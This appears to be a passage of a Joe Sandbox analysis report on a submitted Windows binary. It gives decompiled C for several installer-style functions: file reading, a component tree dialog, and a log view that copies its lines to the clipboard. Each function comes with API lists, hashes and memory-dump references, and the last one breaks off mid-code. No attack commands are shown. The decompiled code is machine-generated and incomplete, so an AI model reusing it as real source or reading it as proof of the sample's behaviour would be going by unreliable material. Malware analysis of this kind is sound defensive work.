Function 004031A8, Relevance: 1.5, APIs: 1, Instructions: 22
fileCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E004031A8(void* _a4, long _a8) {
				int _t6;
				long _t10;

				_t10 = _a8;
				_t6 = ReadFile( *0x409010, _a4, _t10,  &_a8, 0); // executed
				if(_t6 == 0 || _a8 != _t10) {
					return 0;
				} else {
					return 1;
				}
			}

0x004031ac
0x004031bf
0x004031c7
0x00000000
0x004031ce
0x00000000
0x004031d0

APIs

ReadFile.KERNELBASE(00409128,00000000,00000000,00000000,00413038,0040B038,004030AD,00413038,00004000,?,00000000,?,00402F37,00000004,00000000,00000000), ref: 004031BF

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: FileRead
String ID:
API String ID: 2738559852-0
Opcode ID: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
Instruction ID: b8f1ad64850fa721b7c3123cc302f733781f6218d307da9d2aa6486ecc23217a
Opcode Fuzzy Hash: b55c46bdf794a51955d6c22ef273c930d40ecd644cbb4da6e13cbea0766faea3
Instruction Fuzzy Hash: 4BE08632254119BBCF105E619C00AD73F5CEB0A3A2F008432FD55E9190D230EA11DBA5

Uniqueness

Uniqueness Score: -1.00%

Function 004031DA, Relevance: 1.5, APIs: 1, Instructions: 6
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E004031DA(long _a4) {
				long _t2;

				_t2 = SetFilePointer( *0x409010, _a4, 0, 0); // executed
				return _t2;
			}

0x004031e8
0x004031ee

APIs

SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402E86,?), ref: 004031E8

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: FilePointer
String ID:
API String ID: 973152223-0
Opcode ID: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
Instruction ID: 0cdacc43d416a0c3c320ce55ce8d4373a9ea66752a7e2c64ddc4eeaf6ba3fa4d
Opcode Fuzzy Hash: a4f108b6483d59a247dd719aa3338c70368b303c79d310cc125f674897935547
Instruction Fuzzy Hash: 49B01271644200BFDA214F00DF05F057B31B790700F108430B394380F082712420EB0D

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 00404772, Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 478
windowmemoryCOMMONCrypto

Download Yara Rule

C-Code - Quality: 97%

			E00404772(struct HWND__* _a4, int _a8, unsigned int _a12, int _a16) {
				struct HWND__* _v8;
				struct HWND__* _v12;
				signed int _v16;
				intOrPtr _v20;
				void* _v24;
				long _v28;
				int _v32;
				signed int _v40;
				int _v44;
				signed int* _v56;
				intOrPtr _v60;
				signed int _v64;
				long _v68;
				void* _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				void* _v84;
				void* __ebx;
				void* __edi;
				void* __esi;
				struct HWND__* _t182;
				int _t196;
				long _t202;
				signed int _t206;
				signed int _t217;
				void* _t220;
				void* _t221;
				int _t227;
				signed int _t232;
				signed int _t233;
				signed int _t240;
				struct HBITMAP__* _t250;
				void* _t252;
				char* _t268;
				signed char _t269;
				long _t274;
				int _t280;
				signed int* _t281;
				int _t282;
				long _t283;
				int _t285;
				long _t286;
				signed int _t287;
				long _t288;
				signed int _t291;
				signed int _t298;
				signed int _t300;
				signed int _t302;
				int* _t310;
				void* _t311;
				int _t315;
				int _t316;
				int _t317;
				signed int _t318;
				void* _t320;

				_v12 = GetDlgItem(_a4, 0x3f9);
				_t182 = GetDlgItem(_a4, 0x408);
				_t280 =  *0x423ec8;
				_t320 = SendMessageA;
				_v8 = _t182;
				_t315 = 0;
				_v32 = _t280;
				_v20 =  *0x423eb0 + 0x94;
				if(_a8 != 0x110) {
					L23:
					if(_a8 != 0x405) {
						_t289 = _a16;
					} else {
						_a12 = _t315;
						_t289 = 1;
						_a8 = 0x40f;
						_a16 = 1;
					}
					if(_a8 == 0x4e || _a8 == 0x413) {
						_v16 = _t289;
						if(_a8 == 0x413 ||  *((intOrPtr*)(_t289 + 4)) == 0x408) {
							if(( *0x423eb9 & 0x00000002) != 0) {
								L41:
								if(_v16 != _t315) {
									_t232 = _v16;
									if( *((intOrPtr*)(_t232 + 8)) == 0xfffffe6e) {
										SendMessageA(_v8, 0x419, _t315,  *(_t232 + 0x5c));
									}
									_t233 = _v16;
									if( *((intOrPtr*)(_t233 + 8)) == 0xfffffe6a) {
										if( *((intOrPtr*)(_t233 + 0xc)) != 2) {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) & 0xffffffdf;
										} else {
											 *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) =  *( *(_t233 + 0x5c) * 0x418 + _t280 + 8) | 0x00000020;
										}
									}
								}
								goto L48;
							}
							if(_a8 == 0x413) {
								L33:
								_t289 = 0 | _a8 != 0x00000413;
								_t240 = E004046F2(_v8, _a8 != 0x413);
								if(_t240 >= _t315) {
									_t93 = _t280 + 8; // 0x8
									_t310 = _t240 * 0x418 + _t93;
									_t289 =  *_t310;
									if((_t289 & 0x00000010) == 0) {
										if((_t289 & 0x00000040) == 0) {
											_t298 = _t289 ^ 0x00000001;
										} else {
											_t300 = _t289 ^ 0x00000080;
											if(_t300 >= 0) {
												_t298 = _t300 & 0xfffffffe;
											} else {
												_t298 = _t300 | 0x00000001;
											}
										}
										 *_t310 = _t298;
										E0040117D(_t240);
										_t289 = 1;
										_a8 = 0x40f;
										_a12 = 1;
										_a16 =  !( *0x423eb8) >> 0x00000008 & 1;
									}
								}
								goto L41;
							}
							_t289 = _a16;
							if( *((intOrPtr*)(_a16 + 8)) != 0xfffffffe) {
								goto L41;
							}
							goto L33;
						} else {
							goto L48;
						}
					} else {
						L48:
						if(_a8 != 0x111) {
							L56:
							if(_a8 == 0x200) {
								SendMessageA(_v8, 0x200, _t315, _t315);
							}
							if(_a8 == 0x40b) {
								_t220 =  *0x420474;
								if(_t220 != _t315) {
									ImageList_Destroy(_t220);
								}
								_t221 =  *0x42048c;
								if(_t221 != _t315) {
									GlobalFree(_t221);
								}
								 *0x420474 = _t315;
								 *0x42048c = _t315;
								 *0x423f00 = _t315;
							}
							if(_a8 != 0x40f) {
								L86:
								if(_a8 == 0x420 && ( *0x423eb9 & 0x00000001) != 0) {
									_t316 = (0 | _a16 == 0x00000020) << 3;
									ShowWindow(_v8, _t316);
									ShowWindow(GetDlgItem(_a4, 0x3fe), _t316);
								}
								goto L89;
							} else {
								E004011EF(_t289, _t315, _t315);
								if(_a12 != _t315) {
									E0040140B(8);
								}
								if(_a16 == _t315) {
									L73:
									E004011EF(_t289, _t315, _t315);
									_v32 =  *0x42048c;
									_t196 =  *0x423ec8;
									_v60 = 0xf030;
									_v16 = _t315;
									if( *0x423ecc <= _t315) {
										L84:
										InvalidateRect(_v8, _t315, 1);
										if( *((intOrPtr*)( *0x42367c + 0x10)) != _t315) {
											E00404610(0x3ff, 0xfffffffb, E004046C5(5));
										}
										goto L86;
									}
									_t281 = _t196 + 8;
									do {
										_t202 =  *((intOrPtr*)(_v32 + _v16 * 4));
										if(_t202 != _t315) {
											_t291 =  *_t281;
											_v68 = _t202;
											_v72 = 8;
											if((_t291 & 0x00000001) != 0) {
												_v72 = 9;
												_v56 =  &(_t281[4]);
												_t281[0] = _t281[0] & 0x000000fe;
											}
											if((_t291 & 0x00000040) == 0) {
												_t206 = (_t291 & 0x00000001) + 1;
												if((_t291 & 0x00000010) != 0) {
													_t206 = _t206 + 3;
												}
											} else {
												_t206 = 3;
											}
											_v64 = (_t206 << 0x0000000b | _t291 & 0x00000008) + (_t206 << 0x0000000b | _t291 & 0x00000008) | _t291 & 0x00000020;
											SendMessageA(_v8, 0x1102, (_t291 >> 0x00000005 & 0x00000001) + 1, _v68);
											SendMessageA(_v8, 0x110d, _t315,  &_v72);
										}
										_v16 = _v16 + 1;
										_t281 =  &(_t281[0x106]);
									} while (_v16 <  *0x423ecc);
									goto L84;
								} else {
									_t282 = E004012E2( *0x42048c);
									E00401299(_t282);
									_t217 = 0;
									_t289 = 0;
									if(_t282 <= _t315) {
										L72:
										SendMessageA(_v12, 0x14e, _t289, _t315);
										_a16 = _t282;
										_a8 = 0x420;
										goto L73;
									} else {
										goto L69;
									}
									do {
										L69:
										if( *((intOrPtr*)(_v20 + _t217 * 4)) != _t315) {
											_t289 = _t289 + 1;
										}
										_t217 = _t217 + 1;
									} while (_t217 < _t282);
									goto L72;
								}
							}
						}
						if(_a12 != 0x3f9 || _a12 >> 0x10 != 1) {
							goto L89;
						} else {
							_t227 = SendMessageA(_v12, 0x147, _t315, _t315);
							if(_t227 == 0xffffffff) {
								goto L89;
							}
							_t283 = SendMessageA(_v12, 0x150, _t227, _t315);
							if(_t283 == 0xffffffff ||  *((intOrPtr*)(_v20 + _t283 * 4)) == _t315) {
								_t283 = 0x20;
							}
							E00401299(_t283);
							SendMessageA(_a4, 0x420, _t315, _t283);
							_a12 = 1;
							_a16 = _t315;
							_a8 = 0x40f;
							goto L56;
						}
					}
				} else {
					 *0x423f00 = _a4;
					_t285 = 2;
					_v28 = 0;
					_v16 = _t285;
					 *0x42048c = GlobalAlloc(0x40,  *0x423ecc << 2);
					_t250 = LoadBitmapA( *0x423ea0, 0x6e);
					 *0x420480 =  *0x420480 | 0xffffffff;
					_v24 = _t250;
					 *0x420488 = SetWindowLongA(_v8, 0xfffffffc, E00404D73);
					_t252 = ImageList_Create(0x10, 0x10, 0x21, 6, 0);
					 *0x420474 = _t252;
					ImageList_AddMasked(_t252, _v24, 0xff00ff);
					SendMessageA(_v8, 0x1109, _t285,  *0x420474);
					if(SendMessageA(_v8, 0x111c, 0, 0) < 0x10) {
						SendMessageA(_v8, 0x111b, 0x10, 0);
					}
					DeleteObject(_v24);
					_t286 = 0;
					do {
						_t258 =  *((intOrPtr*)(_v20 + _t286 * 4));
						if( *((intOrPtr*)(_v20 + _t286 * 4)) != _t315) {
							if(_t286 != 0x20) {
								_v16 = _t315;
							}
							SendMessageA(_v12, 0x151, SendMessageA(_v12, 0x143, _t315, E00405AA7(_t286, _t315, _t320, _t315, _t258)), _t286);
						}
						_t286 = _t286 + 1;
					} while (_t286 < 0x21);
					_t317 = _a16;
					_t287 = _v16;
					_push( *((intOrPtr*)(_t317 + 0x30 + _t287 * 4)));
					_push(0x15);
					E00403E37(_a4);
					_push( *((intOrPtr*)(_t317 + 0x34 + _t287 * 4)));
					_push(0x16);
					E00403E37(_a4);
					_t318 = 0;
					_t288 = 0;
					if( *0x423ecc <= 0) {
						L19:
						SetWindowLongA(_v8, 0xfffffff0, GetWindowLongA(_v8, 0xfffffff0) & 0x000000fb);
						goto L20;
					} else {
						_t311 = _v32 + 8;
						_v24 = _t311;
						do {
							_t268 = _t311 + 0x10;
							if( *_t268 != 0) {
								_v60 = _t268;
								_t269 =  *_t311;
								_t302 = 0x20;
								_v84 = _t288;
								_v80 = 0xffff0002;
								_v76 = 0xd;
								_v64 = _t302;
								_v40 = _t318;
								_v68 = _t269 & _t302;
								if((_t269 & 0x00000002) == 0) {
									if((_t269 & 0x00000004) == 0) {
										 *( *0x42048c + _t318 * 4) = SendMessageA(_v8, 0x1100, 0,  &_v84);
									} else {
										_t288 = SendMessageA(_v8, 0x110a, 3, _t288);
									}
								} else {
									_v76 = 0x4d;
									_v44 = 1;
									_t274 = SendMessageA(_v8, 0x1100, 0,  &_v84);
									_v28 = 1;
									 *( *0x42048c + _t318 * 4) = _t274;
									_t288 =  *( *0x42048c + _t318 * 4);
								}
							}
							_t318 = _t318 + 1;
							_t311 = _v24 + 0x418;
							_v24 = _t311;
						} while (_t318 <  *0x423ecc);
						if(_v28 != 0) {
							L20:
							if(_v16 != 0) {
								E00403E6C(_v8);
								_t280 = _v32;
								_t315 = 0;
								goto L23;
							} else {
								ShowWindow(_v12, 5);
								E00403E6C(_v12);
								L89:
								return E00403E9E(_a8, _a12, _a16);
							}
						}
						goto L19;
					}
				}
			}

APIs

GetDlgItem.USER32 ref: 00404789
GetDlgItem.USER32 ref: 00404796
GlobalAlloc.KERNEL32(00000040,?), ref: 004047E2
LoadBitmapA.USER32 ref: 004047F5
SetWindowLongA.USER32(?,000000FC,00404D73), ref: 0040480F
ImageList_Create.COMCTL32(00000010,00000010,00000021,00000006,00000000), ref: 00404823
ImageList_AddMasked.COMCTL32(00000000,?,00FF00FF), ref: 00404837
SendMessageA.USER32(?,00001109,00000002), ref: 0040484C
SendMessageA.USER32(?,0000111C,00000000,00000000), ref: 00404858
SendMessageA.USER32(?,0000111B,00000010,00000000), ref: 0040486A
DeleteObject.GDI32(?), ref: 0040486F
SendMessageA.USER32(?,00000143,00000000,00000000), ref: 0040489A
SendMessageA.USER32(?,00000151,00000000,00000000), ref: 004048A6
SendMessageA.USER32(?,00001100,00000000,?), ref: 0040493B
SendMessageA.USER32(?,0000110A,00000003,00000000), ref: 00404966
SendMessageA.USER32(?,00001100,00000000,?), ref: 0040497A
GetWindowLongA.USER32 ref: 004049A9
SetWindowLongA.USER32(?,000000F0,00000000), ref: 004049B7
ShowWindow.USER32(?,00000005), ref: 004049C8
SendMessageA.USER32(?,00000419,00000000,?), ref: 00404ACB
SendMessageA.USER32(?,00000147,00000000,00000000), ref: 00404B30
SendMessageA.USER32(?,00000150,00000000,00000000), ref: 00404B45
SendMessageA.USER32(?,00000420,00000000,00000020), ref: 00404B69
SendMessageA.USER32(?,00000200,00000000,00000000), ref: 00404B8F
ImageList_Destroy.COMCTL32(?), ref: 00404BA4
GlobalFree.KERNEL32 ref: 00404BB4
SendMessageA.USER32(?,0000014E,00000000,00000000), ref: 00404C24
SendMessageA.USER32(?,00001102,00000410,?), ref: 00404CCD
SendMessageA.USER32(?,0000110D,00000000,00000008), ref: 00404CDC
InvalidateRect.USER32(?,00000000,00000001), ref: 00404CFC
ShowWindow.USER32(?,00000000), ref: 00404D4A
GetDlgItem.USER32 ref: 00404D55
ShowWindow.USER32(00000000), ref: 00404D5C

Strings

, xrefs: 00404D34
M, xrefs: 00404922
N, xrefs: 00404A06

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: MessageSend$Window$ImageItemList_LongShow$Global$AllocBitmapCreateDeleteDestroyFreeInvalidateLoadMaskedObjectRect
String ID: $M$N
API String ID: 1638840714-813528018
Opcode ID: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
Instruction ID: 2baebcd050ce5e3cc44cfd390f58c160629cefacb8a2130a1722bfbf049ea566
Opcode Fuzzy Hash: 32139a76c024986513f02143e9fc3436abe218e466eac6ee11a08412876e8968
Instruction Fuzzy Hash: 5A02B0B0A00208AFDB24DF55DC45BAE7BB5FB84315F10817AF610BA2E1C7799A42CF58

Uniqueness

Uniqueness Score: -1.00%

Function 00404F61, Relevance: 65.0, APIs: 36, Strings: 1, Instructions: 278
windowclipboardmemoryCOMMON

Download Yara Rule

C-Code - Quality: 95%

			E00404F61(struct HWND__* _a4, long _a8, long _a12, unsigned int _a16) {
				struct HWND__* _v8;
				long _v12;
				struct tagRECT _v28;
				void* _v36;
				signed int _v40;
				int _v44;
				int _v48;
				signed int _v52;
				int _v56;
				void* _v60;
				void* _v68;
				void* __ebx;
				void* __edi;
				void* __esi;
				long _t87;
				unsigned int _t92;
				int _t94;
				int _t95;
				void* _t101;
				intOrPtr _t112;
				intOrPtr _t123;
				struct HWND__* _t127;
				int _t149;
				int _t150;
				struct HWND__* _t154;
				struct HWND__* _t158;
				struct HMENU__* _t160;
				long _t162;
				void* _t163;
				short* _t164;

				_t154 =  *0x423684;
				_t149 = 0;
				_v8 = _t154;
				if(_a8 != 0x110) {
					if(_a8 == 0x405) {
						CloseHandle(CreateThread(0, 0, E00404EF5, GetDlgItem(_a4, 0x3ec), 0,  &_v12));
					}
					if(_a8 != 0x111) {
						L17:
						if(_a8 != 0x404) {
							L25:
							if(_a8 != 0x7b || _a12 != _t154) {
								goto L20;
							} else {
								_t87 = SendMessageA(_t154, 0x1004, _t149, _t149);
								_a8 = _t87;
								if(_t87 <= _t149) {
									L37:
									return 0;
								}
								_t160 = CreatePopupMenu();
								AppendMenuA(_t160, _t149, 1, E00405AA7(_t149, _t154, _t160, _t149, 0xffffffe1));
								_t92 = _a16;
								if(_t92 != 0xffffffff) {
									_t150 = _t92;
									_t94 = _t92 >> 0x10;
								} else {
									GetWindowRect(_t154,  &_v28);
									_t150 = _v28.left;
									_t94 = _v28.top;
								}
								_t95 = TrackPopupMenu(_t160, 0x180, _t150, _t94, _t149, _a4, _t149);
								_t162 = 1;
								if(_t95 == 1) {
									_v60 = _t149;
									_v48 = 0x420498;
									_v44 = 0xfff;
									_a4 = _a8;
									do {
										_a4 = _a4 - 1;
										_t162 = _t162 + SendMessageA(_v8, 0x102d, _a4,  &_v68) + 2;
									} while (_a4 != _t149);
									OpenClipboard(_t149);
									EmptyClipboard();
									_t101 = GlobalAlloc(0x42, _t162);
									_a4 = _t101;
									_t163 = GlobalLock(_t101);
									do {
										_v48 = _t163;
										_t164 = _t163 + SendMessageA(_v8, 0x102d, _t149,  &_v68);
										 *_t164 = 0xa0d;
										_t163 = _t164 + 2;
										_t149 = _t149 + 1;
									} while (_t149 < _a8);
									GlobalUnlock(_a4);
									SetClipboardData(1, _a4);
									CloseClipboard();
								}
								goto L37;
							}
						}
						if( *0x42366c == _t149) {
							ShowWindow( *0x423ea8, 8);
							if( *0x423f2c == _t149) {
								_t112 =  *0x41fc68; // 0x0
								E00404E23( *((intOrPtr*)(_t112 + 0x34)), _t149);
							}
							E00403E10(1);
							goto L25;
						}
						 *0x41f860 = 2;
						E00403E10(0x78);
						goto L20;
					} else {
						if(_a12 != 0x403) {
							L20:
							return E00403E9E(_a8, _a12, _a16);
						}
						ShowWindow( *0x423670, _t149);
						ShowWindow(_t154, 8);
						E00403E6C(_t154);
						goto L17;
					}
				}
				_v52 = _v52 | 0xffffffff;
				_v40 = _v40 | 0xffffffff;
				_v60 = 2;
				_v56 = 0;
				_v48 = 0;
				_v44 = 0;
				asm("stosd");
				asm("stosd");
				_t123 =  *0x423eb0;
				_a8 =  *((intOrPtr*)(_t123 + 0x5c));
				_a12 =  *((intOrPtr*)(_t123 + 0x60));
				 *0x423670 = GetDlgItem(_a4, 0x403);
				 *0x423668 = GetDlgItem(_a4, 0x3ee);
				_t127 = GetDlgItem(_a4, 0x3f8);
				 *0x423684 = _t127;
				_v8 = _t127;
				E00403E6C( *0x423670);
				 *0x423674 = E004046C5(4);
				 *0x42368c = 0;
				GetClientRect(_v8,  &_v28);
				_v52 = _v28.right - GetSystemMetrics(0x15);
				SendMessageA(_v8, 0x101b, 0,  &_v60);
				SendMessageA(_v8, 0x1036, 0x4000, 0x4000);
				if(_a8 >= 0) {
					SendMessageA(_v8, 0x1001, 0, _a8);
					SendMessageA(_v8, 0x1026, 0, _a8);
				}
				if(_a12 >= _t149) {
					SendMessageA(_v8, 0x1024, _t149, _a12);
				}
				_push( *((intOrPtr*)(_a16 + 0x30)));
				_push(0x1b);
				E00403E37(_a4);
				if(( *0x423eb8 & 0x00000003) != 0) {
					ShowWindow( *0x423670, _t149);
					if(( *0x423eb8 & 0x00000002) != 0) {
						 *0x423670 = _t149;
					} else {
						ShowWindow(_v8, 8);
					}
					E00403E6C( *0x423668);
				}
				_t158 = GetDlgItem(_a4, 0x3ec);
				SendMessageA(_t158, 0x401, _t149, 0x75300000);
				if(( *0x423eb8 & 0x00000004) != 0) {
					SendMessageA(_t158, 0x409, _t149, _a12);
					SendMessageA(_t158, 0x2001, _t149, _a8);
				}
				goto L37;
			}

APIs

GetDlgItem.USER32 ref: 00404FC0
GetDlgItem.USER32 ref: 00404FCF
GetClientRect.USER32 ref: 0040500C
GetSystemMetrics.USER32 ref: 00405014
SendMessageA.USER32(?,0000101B,00000000,00000002), ref: 00405035
SendMessageA.USER32(?,00001036,00004000,00004000), ref: 00405046
SendMessageA.USER32(?,00001001,00000000,00000110), ref: 00405059
SendMessageA.USER32(?,00001026,00000000,00000110), ref: 00405067
SendMessageA.USER32(?,00001024,00000000,?), ref: 0040507A
ShowWindow.USER32(00000000,?,0000001B,000000FF), ref: 0040509C
ShowWindow.USER32(?,00000008), ref: 004050B0
GetDlgItem.USER32 ref: 004050D1
SendMessageA.USER32(00000000,00000401,00000000,75300000), ref: 004050E1
SendMessageA.USER32(00000000,00000409,00000000,?), ref: 004050FA
SendMessageA.USER32(00000000,00002001,00000000,00000110), ref: 00405106
GetDlgItem.USER32 ref: 00404FDE

Part of subcall function 00403E6C: SendMessageA.USER32(00000028,?,00000001,00403C9D), ref: 00403E7A

GetDlgItem.USER32 ref: 00405123
CreateThread.KERNEL32 ref: 00405131
CloseHandle.KERNEL32(00000000), ref: 00405138
ShowWindow.USER32(00000000), ref: 0040515C
ShowWindow.USER32(?,00000008), ref: 00405161
ShowWindow.USER32(00000008), ref: 004051A8
SendMessageA.USER32(?,00001004,00000000,00000000), ref: 004051DA
CreatePopupMenu.USER32 ref: 004051EB
AppendMenuA.USER32 ref: 00405200
GetWindowRect.USER32 ref: 00405213
TrackPopupMenu.USER32(00000000,00000180,?,?,00000000,?,00000000), ref: 00405237
SendMessageA.USER32(?,0000102D,00000000,?), ref: 00405272
OpenClipboard.USER32(00000000), ref: 00405282
EmptyClipboard.USER32(?,?,00000000,?,00000000), ref: 00405288
GlobalAlloc.KERNEL32(00000042,?,?,?,00000000,?,00000000), ref: 00405291
GlobalLock.KERNEL32 ref: 0040529B
SendMessageA.USER32(?,0000102D,00000000,?), ref: 004052AF
GlobalUnlock.KERNEL32(00000000,?,?,00000000,?,00000000), ref: 004052C7
SetClipboardData.USER32 ref: 004052D2
CloseClipboard.USER32 ref: 004052D8

Strings

{, xrefs: 004051C7

Memory Dump Source

Source File: 0000000F.00000002.342969714.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000F.00000002.342869266.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343107648.0000000000407000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343203428.0000000000409000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343348948.0000000000422000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343411245.0000000000429000.00000004.00020000.sdmp Download File
Associated: 0000000F.00000002.343451233.000000000042C000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343464735.000000000042E000.00000002.00020000.sdmp Download File
Associated: 0000000F.00000002.343728294.000000000046E000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_chmac.jbxd

Similarity

API ID: MessageSend$Window$ItemShow$Clipboard$GlobalMenu$CloseCreatePopupRect$AllocAppendClientDataEmptyHandleLockMetricsOpenSystemThreadTrackUnlock
String ID: {
API String ID: 590372296-366298937
Opcode ID: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
Instruction ID: fc5da488f7bc2ad647f0a41a3fd7729356532ad04293fc61f6ec29e3deb516b2
Opcode Fuzzy Hash: b76f0574efc38b34ce8dbf5e96f3f583adbecdbce84d3d3c4a555a9ceab87f0c
Instruction Fuzzy Hash: 94A14B70900208BFDB219F60DD89AAE7F79FB08355F10417AFA04BA2A0C7795E41DF69

Uniqueness

Uniqueness Score: -1.00%

Function 00403964, Relevance: 48.3, APIs: 32, Instructions: 345
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 83%

			E00403964(struct HWND__* _a4, signed int _a8, int _a12, long _a16) {
				struct HWND__* _v32;
				void* _v84;
				void* _v88;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t35;
				signed int _t37;
				signed int _t39;
				struct HWND__* _t49;
				signed int _t67;
				struct HWND__* _t73;
				signed int _t86;
				struct HWND__* _t91;
				signed int _t99;
				int _t103;
				signed int _t115;
				signed int _t116;
				int _t117;
				signed int _t122;
				struct HWND__* _t125;
				struct HWND__* _t126;
				int _t127;
				long _t130;
				int _t132;
				int _t133;
				void* _t134;

				_t115 = _a8;
				if(_t115 == 0x110 || _t115 == 0x408) {
					_t35 = _a12;
					_t125 = _a4;
					__eflags = _t115 - 0x110;
					 *0x42047c = _t35;
					if(_t115 == 0x110) {
						 *0x423ea8 = _t125;
						 *0x420490 = GetDlgItem(_t125, 1);
						_t91 = GetDlgItem(_t125, 2);
						_push(0xffffffff);
						_push(0x1c);
						 *0x41f458 = _t91;
						E00403E37(_t125);
						SetClassLongA(_t125, 0xfffffff2,  *0x423688);
						 *0x42366c = E0040140B(4);
						_t35 = 1;
						__eflags = 1;
						 *0x42047c = 1;
					}
					_t122 =  *0x4091bc; // 0xffffffff
					_t133 = 0;
					_t130 = (_t122 << 6) +  *0x423ec0;
					__eflags = _t122;
					if(_t122 < 0) {
						L34:
						E00403E83(0x40b);
						while(1) {
							_t37 =  *0x42047c;
							 *0x4091bc =  *0x4091bc + _t37;
							_t130 = _t130 + (_t37 << 6);
							_t39 =  *0x4091bc; // 0xffffffff
							__eflags = _t39 -  *0x423ec4;
							if(_t39 ==  *0x423ec4) {
								E0040140B(1);
							}
							__eflags =  *0x42366c - _t133;
							if( *0x42366c != _t133) {
								break;
							}
							__eflags =  *0x4091bc -  *0x423ec4; // 0xffffffff
							if(__eflags >= 0) {
								break;
							}
							_t116 =  *(_t130 + 0x14);
							E00405AA7(_t116, _t125, _t130, 0x42b800,  *((intOrPtr*)(_t130 + 0x24)));
							_push( *((intOrPtr*)(_t130 + 0x20)));
							_push(0xfffffc19);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x1c)));
							_push(0xfffffc1b);
							E00403E37(_t125);
							_push( *((intOrPtr*)(_t130 + 0x28)));
							_push(0xfffffc1a);
							E00403E37(_t125);
							_t49 = GetDlgItem(_t125, 3);
							__eflags =  *0x423f2c - _t133;
							_v32 = _t49;
							if( *0x423f2c != _t133) {
								_t116 = _t116 & 0x0000fefd | 0x00000004;
								__eflags = _t116;
							}
							ShowWindow(_t49, _t116 & 0x00000008);
							EnableWindow( *(_t134 + 0x30), _t116 & 0x00000100);
							E00403E59(_t116 & 0x00000002);
							_t117 = _t116 & 0x00000004;
							EnableWindow( *0x41f458, _t117);
							__eflags = _t117 - _t133;
							if(_t117 == _t133) {
								_push(1);
							} else {
								_push(_t133);
							}
							EnableMenuItem(GetSystemMenu(_t125, _t133), 0xf060, ??);
							SendMessageA( *(_t134 + 0x38), 0xf4, _t133, 1);
							__eflags =  *0x423f2c - _t133;
							if( *0x423f2c == _t133) {
								_push( *0x420490);
							} else {
								SendMessageA(_t125, 0x401, 2, _t133);
								_push( *0x41f458);
							}
							E00403E6C();
							E00405A85(0x420498, 0x4236a0);
							E00405AA7(0x420498, _t125, _t130,  &(0x420498[lstrlenA(0x420498)]),  *((intOrPtr*)(_t130 + 0x18)));
							SetWindowTextA(_t125, 0x420498);
							_push(_t133);
							_t67 = E00401389( *((intOrPtr*)(_t130 + 8)));
							__eflags = _t67;
							if(_t67 != 0) {
								continue;
							} else {
								__eflags =  *_t130 - _t133;
								if( *_t130 == _t133) {
									continue;
								}
								__eflags =  *(_t130 + 4) - 5;
								if( *(_t130 + 4) != 5) {
									DestroyWindow( *0x423678);
									 *0x41fc68 = _t130;
									__eflags =  *_t130 - _t133;
